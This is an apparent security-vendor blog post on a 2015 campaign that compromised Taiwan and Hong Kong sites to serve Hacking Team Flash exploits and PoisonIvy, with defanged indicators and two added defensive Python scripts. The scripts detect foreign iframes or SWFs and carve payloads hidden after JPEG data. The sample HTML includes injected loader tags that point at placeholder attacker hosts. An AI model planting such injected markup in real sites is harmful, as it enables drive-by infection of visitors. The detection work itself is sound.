A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team and eventually download PoisonIvy and other payloads onto user systems. The campaign started on July 9, a few days after Hacking Team announced it was hacked.
The actors compromised the sites of a local television network, educational organizations, a religious institute, and a known political party in Taiwan, as well as a popular news site in Hong Kong. Note that the affected sites have a steady following given the nature of their content. The affected educational organizations, for instance, are used to deliver employment exams for government employees. The Taiwanese television network involved has been producing and importing TV shows and movies for a decade.
We have notified the owners of the sites that are affected by the campaign; however, three sites are still compromised as of this writing.
Traces of Hacking Team Still Out There
The actors initially delivered a Flash Player exploit (CVE-2015-5119) found in the Hacking Team dump to the pre-compromised sites a few days after the company announced it was hacked (July 5) and Adobe patched the flaw (July 7). They then launched a second wave of attacks by delivering another Flash zero-day exploit related to Hacking Team (CVE-2015-5122).
Figure 1. Timeline of Flash exploits related to Hacking Team delivered to Taiwan and Hong Kong sites
Note that, at the start of both the first and the second wave of attacks, the actors included the same two Taiwanese educational organizations’ websites among their targets.
Figure 2. Screenshot of a religious organization’s site in Taiwan compromised to deliver CVE-2015-5122
PoisonIvy and Other Payloads
We found that all the compromised sites, except for the official site of a known Taiwanese political party, were injected with an iframe that loads a malicious SWF, which in turn leads to the remote access tool (RAT) PoisonIvy, detected here as BKDR_POISON.TUFW, as the final payload. PoisonIvy is a popular RAT backdoor available in the underground market and typically used in targeted attacks. This backdoor is known to capture screenshots, webcam images, and audio; log keystrokes and the active window; delete, search for, and upload files; and perform other intrusive routines.
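The injection described above (an iframe dropped into a legitimate page that pulls an SWF from an attacker-controlled host) is something site owners can look for in their own HTML. The following is an added example, not code from the original post: it parses a page, collects every element able to load a frame or a Flash movie, and reports the ones whose target host differs from the site's own. The sample page and all hostnames in it are constructed placeholders.

```python
"""Added example (not code from the original post): flag HTML that pulls in an
iframe or an SWF from a host other than the page's own. The sample page and the
hostnames in it are constructed placeholders."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SWF_RE = re.compile(r"\.swf$", re.I)


class LoaderCollector(HTMLParser):
    """Collect (tag, url) for every element able to load a frame or a Flash movie."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        url = ""
        if tag in ("iframe", "embed"):
            url = a.get("src", "")
        elif tag == "object":
            url = a.get("data", "")
        elif tag == "param" and a.get("name", "").lower() == "movie":
            url = a.get("value", "")
        if url:
            self.refs.append((tag, url))


def find_foreign_loaders(html, page_host):
    """Return (tag, url, reason) triples for loaders that deserve a closer look.

    Two rules, both taken from the behaviour described in the post:
      * an iframe sourced from a host other than the page's own host;
      * any element loading an SWF from a host other than the page's own host.
    Relative URLs resolve to the page's own host and are left alone.
    """
    collector = LoaderCollector()
    collector.feed(html)
    page_host = page_host.lower()
    findings = []
    for tag, url in collector.refs:
        parsed = urlparse(url.strip())
        host = (parsed.hostname or page_host).lower()
        if host == page_host:
            continue
        if SWF_RE.search(parsed.path):
            findings.append((tag, url, "SWF loaded from foreign host " + host))
        elif tag == "iframe":
            findings.append((tag, url, "iframe sourced from foreign host " + host))
    return findings


# Constructed sample page: one legitimate same-host frame, one same-host SWF,
# and injected Flash loaders pointing at placeholder foreign hosts.
SAMPLE_PAGE = """
<html><body>
<img src="/images/logo.png">
<iframe src="/player/embed.html" width="640" height="360"></iframe>
<embed src="/media/intro.swf" type="application/x-shockwave-flash">
<iframe src="http://ads.placeholder-attacker.example/flash/movie.swf" width="1" height="1"></iframe>
<object data="//cdn.placeholder-attacker.example/loader.swf" type="application/x-shockwave-flash">
  <param name="movie" value="//cdn.placeholder-attacker.example/loader.swf">
</object>
</body></html>
"""

if __name__ == "__main__":
    for tag, url, reason in find_foreign_loaders(SAMPLE_PAGE, "news.placeholder-site.example"):
        print(f"<{tag}> {url}: {reason}")
```

Run against a saved copy of each page on a regular schedule and diff the findings over time; an SWF or frame that suddenly appears from a host the site has never referenced before is exactly the pattern seen in this campaign. Same-host loaders are deliberately ignored so that a site's own legitimate Flash content does not generate noise.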
The party’s site, on the other hand, was observed delivering a different payload, embedded in a picture and detected as TROJ_JPGEMBED.F. It sends collected information to the same server as the other sites (223[.]27[.]43[.]32), which leads us to believe that it is part of the same campaign.
Figure 3. Photo where a final payload of Hacking Team Flash exploit campaign is embedded
Although analysis is still ongoing to determine whether this campaign is a targeted attack, we found a suspicious domain, wut[.]mophecfbr[.]com, embedded in the payload; this domain was listed in the command-and-control (C&C) list of a previously reported targeted attack dubbed “Tomato Garden.”
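Two of the findings above lend themselves to a reusable check: a payload hidden inside a picture, and a known C&C domain showing up inside that payload. The following is an added example, not the post's or Trend Micro's code. It walks a JPEG's segment structure to carve whatever has been appended after the end-of-image marker (a common way of hiding a payload in an image, assumed here, since the post does not say how TROJ_JPGEMBED.F embeds its payload), extracts domain-like strings from the carved bytes, and matches them against a watchlist. The image skeleton and the payload are constructed; the only real indicator used is the domain named in the post.

```python
"""Added example (not the original post's code): carve data appended after a
JPEG's end-of-image marker, pull domain-like strings out of it and check them
against a C&C watchlist. The image and payload below are constructed."""
import re

EOI, SOS = 0xD9, 0xDA
STANDALONE = {0x01, 0xD8} | set(range(0xD0, 0xD8))  # TEM, SOI, RST0-RST7: no length field


def carve_trailing_payload(data):
    """Return every byte after the JPEG end-of-image marker (b"" if none).

    Walks the segment structure instead of searching for FF D9 from the end,
    so thumbnails inside EXIF or FF D9 bytes inside the appended blob cannot
    confuse the carve. Inside entropy-coded data a 0xFF is always followed by
    0x00 (stuffing) or an RSTn marker, so any other value starts a marker.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte before a marker
            pos += 1
            continue
        if marker == EOI:
            return data[pos + 2:]
        if marker in STANDALONE:
            pos += 2
            continue
        seglen = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + seglen
        if marker == SOS:             # skip entropy-coded scan data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


DOMAIN_RE = re.compile(rb"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I)


def extract_domains(blob):
    """Domain-looking ASCII strings in the blob, lowercased and de-duplicated."""
    return sorted({m.group(0).decode("ascii").lower() for m in DOMAIN_RE.finditer(blob)})


def refang(indicator):
    """Turn a defanged indicator such as wut[.]mophecfbr[.]com back into a hostname."""
    return indicator.replace("[.]", ".").lower()


def scan_image(data, watchlist):
    """Summarise what is hiding after the image: size, PE header, domains, watchlist hits."""
    tail = carve_trailing_payload(data)
    domains = extract_domains(tail)
    wl = {refang(d) for d in watchlist}
    return {
        "trailing_bytes": len(tail),
        "pe_header": tail[:2] == b"MZ",
        "domains": domains,
        "watchlist_hits": [d for d in domains if d in wl],
    }


def build_sample_jpeg(payload):
    """Constructed minimal JPEG skeleton (APP0 + SOS + fake scan data) with
    `payload` appended after EOI. It parses as a JPEG but is not a real picture."""
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00" + b"\x01\x01" + b"\x00" \
        + b"\x00\x01" + b"\x00\x01" + b"\x00\x00"
    sos = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78\xff\xd9"  # stuffed FF, an RST0, then EOI
    return b"\xff\xd8" + app0 + sos + scan + payload


# Constructed payload: a fake PE header, the C&C domain from the post, and a
# placeholder benign host so the watchlist match is selective.
SAMPLE_PAYLOAD = (b"MZ\x90\x00" + b"\x00" * 12
                  + b"wut.mophecfbr.com\x00"
                  + b"static.placeholder-cdn.example\x00")
CC_WATCHLIST = ["wut[.]mophecfbr[.]com"]  # defanged, as written in the post

if __name__ == "__main__":
    print(scan_image(build_sample_jpeg(SAMPLE_PAYLOAD), CC_WATCHLIST))
```

Any non-zero `trailing_bytes` on an image served by a public site is worth a look on its own; a PE header or a watchlist hit in the tail turns it into an incident. The same `scan_image` routine can be pointed at images fetched from the compromised sites listed above once the defanged indicators from the post are added to the watchlist.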
To protect machines from these exploits and unwanted backdoor access, users should update Adobe Flash Player. You can verify whether you are running the latest version on the Adobe Flash Player page. It also helps to keep up with the latest news on widely used software. Read more about recent Flash-related incidents and what users and companies can do in our blog post, “The Adobe Flash Conundrum: Old Habits Die Hard.”
Trend Micro detects all malware and exploits related to this incident. The SHA1s are outlined below:
Timeline of posts related to the Hacking Team

| Date | Event |
| --- | --- |
| July 5 | The Italian company Hacking Team was hacked, with more than 400GB of confidential company data made available to the public. Three exploits (two for Flash Player and one for the Windows kernel) were initially found in the information dump; one of these, CVE-2015-5119, was a Flash zero-day. The Windows kernel vulnerability (CVE-2015-2387) existed in the OpenType font manager module (ATMFD.dll) and can be exploited to bypass the sandbox mitigation mechanism. |
| July 11 | Two new Flash zero-day vulnerabilities, CVE-2015-5122 and CVE-2015-5123, were found in the Hacking Team dump. |
| July 13 | Further analysis of the Hacking Team dump revealed that the company used a UEFI BIOS rootkit to keep its Remote Control System (RCS) agent installed on its targets’ systems. |
| July 14 | A new zero-day vulnerability (CVE-2015-2425) was found in Internet Explorer. |
| July 16 | On the mobile front, a fake news app designed to bypass Google Play was discovered. |
| July 20 | A new zero-day vulnerability (CVE-2015-2426) was found in Windows, which Microsoft fixed in an out-of-band patch. |
| July 21 | Analysis of the RCSAndroid spying tool revealed that Hacking Team could listen in on calls and root devices to get in. |
| July 28 | A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team. |